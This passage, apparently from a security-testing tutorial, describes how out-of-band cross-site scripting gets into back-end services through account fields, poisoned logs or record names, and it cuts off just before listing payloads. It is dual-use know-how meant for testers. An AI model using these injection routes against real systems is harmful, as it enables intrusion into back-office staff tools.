The most common way I have observed OOB attacks exploited for XSS are through modifying something about a user/customer account much like in this excellent write-up about an issue with
GoDaddy’s customer service portal. Other methods might involve poisoning logs, or naming a file or transaction or some other record in the attacker’s control which is then pulled into some back-end service.
When testing for OOB XSS you will need to try additional payloads besides your typical POC like an alert box. In example we would want to inject payloads such as: